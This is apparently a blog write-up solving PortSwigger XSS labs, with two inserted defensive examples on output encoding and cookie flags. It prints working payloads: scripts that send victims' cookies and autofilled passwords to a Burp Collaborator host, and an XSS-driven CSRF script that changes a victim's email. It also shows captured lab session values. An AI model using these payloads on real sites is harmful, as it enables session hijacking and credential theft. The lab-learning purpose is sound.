Cross-site scripting | XSS explained (PortSwigger solve)
Hello guys, this is my third post on Medium. In today's blog I'm going to talk about the XSS vulnerability with the help of the https://portswigger.net labs. We will solve the reflected XSS labs; you can read about the vulnerability itself in the PortSwigger lab material. Let's start with the first lab.

Click on the lab and read the lab description:
This lab contains a simple reflected cross-site scripting vulnerability in the search functionality. To solve the lab, perform a cross-site scripting attack that calls the alert function.
With this information we can start.

We have a search bar where we enter our payload and press Enter:
<script>alert(1)</script>
Bingo, we solved our lab.
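The lab reflects the search term into the page unencoded, which is why the payload runs. The server-side fix is HTML output encoding; the example below is added here and is not code from the lab or the original post. It contrasts a vulnerable render function with an encoded one (the template string is an assumption standing in for the lab's real page), and the same encoding applied to stored comment output is what closes the later comment-based labs.

```javascript
// Added example (not from the PortSwigger labs or the original post): the
// server-side fix for the reflected XSS in Lab 1. The search term lands in an
// HTML body context, so every character with HTML meaning is encoded first.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Encode a string for insertion into an HTML element body or quoted attribute.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering (assumed template): the raw term is written into the page.
function renderSearchVulnerable(term) {
  return `<h1>0 search results for '${term}'</h1>`;
}

// Fixed rendering: same template, but the term is encoded before insertion.
function renderSearchFixed(term) {
  return `<h1>0 search results for '${escapeHtml(term)}'</h1>`;
}

// Constructed sample input: the Lab 1 payload from the post.
const LAB1_PAYLOAD = '<script>alert(1)</script>';

// Crude check used only to show the difference: is there a real <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable:', renderSearchVulnerable(LAB1_PAYLOAD));
console.log('fixed:     ', renderSearchFixed(LAB1_PAYLOAD));
```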

Lab 2: Impact of reflected XSS attacks (Exploiting cross-site scripting to steal cookies)
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's session cookie, then use this cookie to impersonate the victim.
For this lab we open a post and submit a comment while intercepting the request in the background with Burp Suite. We send the request to Repeater and prepare our payload:
<script>document.location='http://yourID.burpcollaborator.net/?'+document.cookie</script>
Select the payload in Burp and press Ctrl+U to URL-encode it, send the request from Repeater, and wait for the callback in Burp Collaborator.

In the Burp Collaborator client, click the Poll now button. Inspect the HTTP request received by Collaborator; its query string contains the victim's cookies, including the session value:
secret=avJbuCyJJiBnI7NFZJ4sbbdOXdKAb4Py; session=4TWOZsQYlS5PASECvxhQPUONxdZ5qi6l
Copy it, then replace the session cookie in your intercepted request to the home page with the session value you obtained.
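The payload above only works because document.cookie can read the session cookie. A cookie flagged HttpOnly is never exposed to script, so auditing Set-Cookie headers for HttpOnly (and Secure, SameSite) is a quick defensive check that limits the impact of this class of XSS; the comment output still has to be encoded to remove the XSS itself. The example below is added here and is not code from the lab or the original post; the cookie value and the list of session-like names are constructed for the example.

```javascript
// Added example (not from the original post or the PortSwigger lab): audit a
// Set-Cookie header for the flags that limit what the Lab 2 payload can do.
// document.cookie only exposes cookies that lack HttpOnly.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = nameValue.indexOf('=');
  const cookie = {
    name: nameValue.slice(0, eq),
    value: nameValue.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [key, val] = attr.split('=').map((s) => s.trim());
    const lower = key.toLowerCase();
    if (lower === 'httponly') cookie.httpOnly = true;
    else if (lower === 'secure') cookie.secure = true;
    else if (lower === 'samesite') cookie.sameSite = val || 'None';
  }
  return cookie;
}

// Names that look like session identifiers (constructed list for this example).
const SESSION_LIKE = /^(session|sessionid|sid|auth|token)$/i;

// Return the findings for one Set-Cookie header; an empty array means it is OK.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (SESSION_LIKE.test(c.name) && !c.httpOnly) {
    findings.push(`${c.name}: missing HttpOnly (readable via document.cookie)`);
  }
  if (!c.secure) findings.push(`${c.name}: missing Secure`);
  if (!c.sameSite || c.sameSite.toLowerCase() === 'none') {
    findings.push(`${c.name}: SameSite not set to Lax or Strict`);
  }
  return findings;
}

// Constructed sample headers: the weak form beside the hardened form.
const WEAK_HEADER = 'session=EXAMPLE_SESSION_VALUE; Path=/';
const HARDENED_HEADER =
  'session=EXAMPLE_SESSION_VALUE; Path=/; Secure; HttpOnly; SameSite=Lax';

console.log('weak:    ', auditSetCookie(WEAK_HEADER));
console.log('hardened:', auditSetCookie(HARDENED_HEADER));
```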

Lab 3: Exploiting cross-site scripting to capture passwords
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's username and password, then use these credentials to log in to the victim's account.
We build our payload according to the requirement: two input fields that the victim's browser will autofill,
<input required="" type="username" name="username">
<input required="" type="password" name="password">
and then capture the values stored in those fields with the help of the JS DOM:
document.getElementsByName("username")[0].value
document.getElementsByName("password")[0].value
So our final payload looks like this:
<input required="" type="username" name="username"><input required="" type="password" name="password"><script>document.location='your-burpC-ID.burpcollaborator.net/?'+document.getElementsByName("username")[0].value+'&'+document.getElementsByName("password")[0].value</script>
Put this value into the comment field of your intercepted proxy request. Also select the payload in Burp and press Ctrl+U to URL-encode it.

The result is as follows.

But it sends the request without the credentials. This can happen because, at the time document.location is set, the browser's autocomplete has not yet filled in the fields, so we use the onchange attribute instead:
<input required="" type="username" name="username"><input required="" type="password" name="password" onchange="document.location='http://YOUR-ID.burpcollaborator.net/?'+document.getElementsByName('username')[0].value+'&'+document.getElementsByName('password')[0].value">

Now we get our credentials like this:

administrator:ef6gbovly0a77qvxul8i

Lab 4: Exploiting XSS to perform CSRF
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials:
wiener:peter
First we try to change the email using the given credentials; the captured request looks like this:
POST /email/change-email HTTP/1.1
Host: ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
DNT: 1
Connection: close
Referer: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net/email
Cookie: session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv
Upgrade-Insecure-Requests: 1
email=a%40a.a&csrf=6f8A1jOKIzioIeAGRZayu2KCRH2q0mTf
Based on the request we observed, we design the payload. It first fetches the /email page to read the victim's CSRF token, then submits the change-email request with that token:
<script>
// Fetch the email page to obtain the victim's current CSRF token
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/email', true);
req.send();
function handleResponse() {
    // Extract the token from the hidden form field in the response
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    // Submit the change-email request with the token, in the victim's session
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/email/change-email', true);
    changeReq.send('csrf=' + token + '&email=a@a.a');
};
</script>
We post it as a comment and finish the lab.

That's all for our XSS labs for now.